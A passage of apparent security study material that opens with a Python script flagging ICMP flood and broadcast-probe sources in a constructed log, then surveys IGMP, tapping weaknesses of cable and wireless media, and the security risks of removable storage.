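from datetime import datetime

# Constructed log format: "<ISO timestamp>Z ICMP type=<n> src=<ip> dst=<ip>"
LINE_RE = re.compile(r"^(\S+) ICMP type=(\d+) src=(\S+) dst=(\S+)$")
ECHO_REQUEST = 8


def make_constructed_log():
    """Constructed sample: one flooding source, one normal host, one broadcast probe."""
    lines = []
    t0 = datetime(2024, 1, 1, 10, 0, 0)
    for i in range(40):                                  # 40 echo requests inside one second
        ts = t0.replace(microsecond=i * 25000)
        lines.append(f"{ts.isoformat()}Z ICMP type=8 src=203.0.113.5 dst=192.168.0.100")
    for i in range(3):                                   # three ordinary pings, one per second
        ts = t0.replace(second=i)
        lines.append(f"{ts.isoformat()}Z ICMP type=8 src=198.51.100.7 dst=192.168.0.100")
    lines.append(f"{t0.isoformat()}Z ICMP type=8 src=203.0.113.200 dst=192.168.0.255")
    lines.append("2024-01-01T10:00:05Z TCP src=198.51.100.7 dst=192.168.0.100 dport=80")  # ignored
    return lines


def parse(line):
    """Return (timestamp, icmp_type, src, dst) or None for non-ICMP / unparseable lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, icmp_type, src, dst = m.groups()
    return datetime.fromisoformat(ts.rstrip("Z")), int(icmp_type), src, dst


def detect_icmp_flood(lines, threshold=20, window_s=1, broadcast_suffix=".255"):
    """Return (sources exceeding `threshold` echo requests in any window,
    sources that sent echo requests to a broadcast-looking address)."""
    per_window = defaultdict(int)       # (src, window index) -> echo-request count
    smurf_sources = set()
    for line in lines:
        parsed = parse(line)
        if parsed is None:
            continue
        ts, icmp_type, src, dst = parsed
        if icmp_type != ECHO_REQUEST:
            continue
        if dst.endswith(broadcast_suffix):              # assumed heuristic; use the real mask
            smurf_sources.add(src)
        per_window[(src, int(ts.timestamp()) // window_s)] += 1
    flooding = {src for (src, _), n in per_window.items() if n > threshold}
    return flooding, smurf_sources


if __name__ == "__main__":
    flooding, smurf = detect_icmp_flood(make_constructed_log())
    print("flooding sources:", sorted(flooding))
    print("broadcast probes:", sorted(smurf))
```

The output of such a check feeds a rate-limit or a temporary block on the offending source, which preserves ICMP for the hosts that use it legitimately.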
Internet Group Management Protocol (IGMP) is used for group messaging and
multicasting. IGMP maintains the list of systems that belong to a multicast group. When a
message is sent to a group, the network delivers a copy to each member rather than the
sender transmitting one copy per recipient.
Multicasting can consume huge amounts of bandwidth in a network and possibly create
a DoS situation. Most network administrators disable the reception of broadcast and
multicast traffic from outside their local network.
The Basics of Cabling, Wires, and Communications
Coax
Coaxial cabling has a center conductor which
is used to carry data from point to point. The
center conductor has an insulator wrapped
around it. A shield is found over the insulator,
and a nonconductive sheath is found around
the shielding.
Coaxial cabling is one of the oldest types of
network cabling still in use.
Coax has two primary vulnerabilities from a
security perspective.
The most common is the addition of a T-connector attached to a network sniffer. Such a
sniffer has unrestricted access to the signaling on the cable, because every station on a
coax segment sees all of the traffic.
The second and less common method involves
a connection called a vampire tap. A vampire tap
is a type of connection that hooks directly into a
coax by piercing the outer sheath and attaching
a small wire to the center conductor or core.
This type of attachment allows a tap to occur
almost anywhere in the network. Taps can be
hard to find because they can be anywhere in
the cable.
The two common methods of tapping a coax cable.
Unshielded Twisted Pair and Shielded Twisted Pair
UTP is broken down into categories (CAT 1
through CAT 7, with CAT 8 added since) that
define bandwidth and performance.
The most common category is CAT 5, which is
rated for 100 MHz and is most frequently used
with 100BASE-TX networks; CAT 5e and above
are needed for 1000 Mbps (1000BASE-T).
The limit of a cable segment length of
twisted pair for use with Ethernet is
100 meters; beyond this length, the
attenuation of the cables may cause
reliability problems.
RJ-45 connectors typically connect
computers to a 100BaseTX network.
UTP and STP cabling is not more secure than
coax. Although it is harder to splice into a
twisted-pair cable mid-run, the cable is used
primarily for internal wiring and terminates at
hubs, switches and patch panels where a
sniffer is easily attached, and three-way
breakout boxes are easy to build or buy.
10Base-T network with a sniffer attached at the hub.
Fiber Optic
Fiber optics and its assembly continue to be very
expensive when compared to wire, and this
technology isn’t common on the desktop.
Fiber networks use a glass or plastic core and
carry light pulses generated by a laser or LED.
Fiber networks are considered the most secure,
although they can be tapped.
Fiber’s greatest security weakness is at the
connections to the fiber-optic transceivers. Passive
connections can be made at the connections, and
signals can be tapped from there.
The other common security issue associated with
fiber optics is that fiber connections are usually
bridged to wire connections.
The figure on the right shows how a fiber
connection to a transceiver can be tapped. This
type of splitter requires a signal regenerator for
the split to function, and it can be easily detected.
Infrared
Infrared allows a point-to-point connection to be
made between two IR transceiver-equipped
devices. Many newer laptop PCs, PDAs, and
portable printers now come equipped with IR
devices for wireless communications. IR is line of
sight; it isn’t secure and can be easily intercepted.
Radio Frequencies
Radio frequency (RF) transmissions use antennas to
send signals across the airwaves. These signals can
be easily intercepted. Anyone can connect a
shortwave receiver to the sound card of a PC to
intercept, receive, and record shortwave and
higher-frequency transmissions.
Microwave Systems
A relative newcomer on the microwave
communications scene is wireless networking
(Wi-Fi operates in the 2.4 and 5 GHz microwave
bands). When implementing wireless networks, make
sure you implement encryption and authentication
(WPA2 or WPA3; the older WEP and WPA are broken)
to prevent the unauthorized disclosure of
information in your network. Many of the newer
devices also support VPN technologies such as
IPsec for traffic that leaves the wireless segment.
A shortwave transmission between two ground sites used for text transmission. Tens of thousands of hobbyists worldwide are eavesdropping.
Employing Removable Storage
Network File System (NFS), Common Internet File System (CIFS), and Server Message Block (SMB) are all protocols used by network-attached storage (NAS).
Removable storage (commonly known as removable media) refers to any type of storage device (such as a floppy drive, magnetic tape
cartridge, or CD-ROM) that can be removed from the system. Removable media is subject to viruses, physical damage, and theft.
All of these devices can store and pass viruses to uninfected systems. Make sure that all files are scanned for viruses before they’re
copied to these media.
CD-R/DVD-R
The CD Recordable (CD-R) allows CDs to be burned on a computer. Most new computer systems come standard with a CD-R burner or
CD-R drive. You can quickly back up data to or restore data from the CD-R. Data theft is easy with a CD-R; an attacker can get on a
system that has a CD-R and copy data from hard disks or servers.
Diskettes
Diskettes have properties similar to hard drives, although they usually store smaller amounts of data. They’re one of the primary
carriers of computer viruses, and they can be used to make copies of small files from hard disks.
Flash Cards
Flash cards, also referred to as memory sticks, are small memory cards that can be used to store information. A system that has a
flash card interface usually treats flash cards like a hard drive. Flash cards can carry viruses, and they can be used to steal small
amounts of information from systems that support them.
Most PDA devices accept flash cards, making them susceptible to viruses that are targeted at PDAs.
Hard Drives
Hard drives can be quickly removed from systems, and portable hard drives can be easily attached. Imaging software can be used to
download a system onto a hard drive in minutes.
Another aspect of hard drive security involves the physical theft or removal of the drives. Hard drives are also susceptible to viruses
because they’re the primary storage devices for most computers.
Network Attached Storage
Most network attached storage (NAS) devices are simply computers dedicated to the task of storing files
for users on the network. The users connect to the NAS units typically through Network File System (NFS)
or Server Message Blocks (SMB) communication with network file servers.
Smart Cards
Smart cards are used for access control, and they can contain a small amount of information. Smart cards
are replacing magnetic cards, in many instances because they can store additional personal information
and are harder to copy or counterfeit.
Smart cards are difficult to counterfeit, but they’re easy to steal. Once a thief has a smart card, they have
all the access the card allows. To prevent this, many organizations don’t put any identifying marks on their
smart cards, making it harder for someone to utilize them. A password or PIN is required to activate many
modern smart cards, and encryption is employed to protect the contents.
Tape
The most common backup and archiving media in large systems is tape. Tape provides the highest-density
storage in the smallest package.
Tape can be restored to another system, and all the contents will be available for review and alteration. It’s
relatively easy to edit a document, put it back on the tape, and then
restore the bogus file back to the original computer system. This, of course, creates an integrity issue that
may be difficult to detect.
Thumb Drives
Thumb drives allow you to store a large quantity of data on something that easily fits into your pocket.
Being nothing more than storage media, thumb drives are susceptible to holding the same malware as
other forms of removable media.
The End